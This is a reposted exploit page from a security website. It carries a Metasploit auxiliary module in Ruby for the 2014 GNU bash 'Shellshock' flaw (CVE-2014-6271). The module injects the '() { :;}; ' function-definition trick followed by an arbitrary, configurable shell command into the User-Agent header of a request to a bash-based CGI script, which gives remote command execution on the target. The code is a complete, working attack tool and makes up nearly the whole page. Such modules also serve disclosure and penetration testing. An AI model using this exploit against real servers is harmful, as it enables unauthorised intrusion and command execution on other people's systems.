首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
GNU bash Environment Variable Command Injection (MSF)
来源:scolley at ioactive.com 作者:Colley 发布时间:2014-09-26  
require 'msf/core'

    class Metasploit3 < Msf::Auxiliary

        include Msf::Exploit::Remote::HttpClient
   

        def initialize(info = {})
            super(update_info(info,
                'Name'           => 'bashedCgi',
                'Description'    => %q{
                   Quick & dirty module to send the BASH exploit payload (CVE-2014-6271) to CGI scripts that are BASH-based or invoke BASH, to execute an arbitrary shell command.
                },
                'Author'         =>
                  [
                    'Stephane Chazelas',                      # vuln discovery
                    'Shaun Colley <scolley at ioactive.com>'  # metasploit module
                  ],
                'License'        => MSF_LICENSE,
                'References'     => [ 'CVE', '2014-6271' ],
                'Targets'        =>
                    [
                        [ 'cgi', {} ]
                    ],
                'DefaultTarget'  => 0,
                'Payload'        =>
                    {
                    'Space'      => 1024,
                    'DisableNops' => true
                    },
                'DefaultOptions' => { 'PAYLOAD' => 0 }
            ))

                register_options(
                    [
                        OptString.new('TARGETURI', [true, 'Absolute path of BASH-based CGI', '/']),
                        OptString.new('CMD', [true, 'Command to execute', '/usr/bin/touch /tmp/metasploit'])
                    ], self.class)
        end

        def run
            res = send_request_cgi({
                'method'   => 'GET',
                'uri'      => datastore['TARGETURI'],
                'agent'    => "() { :;}; " + datastore['CMD']
            })

            if res && res.code == 200
                print_good("Command sent - 200 received")
            else
                print_error("Command sent - non-200 reponse")
            end
        end
    end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·GNU bash Environment Variable
·Nucom ADSL ADSLR5000UN ISP Cre
·Mac OS X VMWare Fusion Root Pr
·Bash Environment Variable Comm
·Perl 5.20.1 Deep Recursion Sta
·Bash Code Injection Proof Of C
·Advantech WebAccess dvs.ocx Ge
·Apache mod_cgi Bash Environmen
·EMC AlphaStor Device Manager O
·DHCP Client Bash Environment V
·ZyXEL Prestig P-660HNU-T1 ISP
·Gnu Bash 4.3 CGI Scan Remote C
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved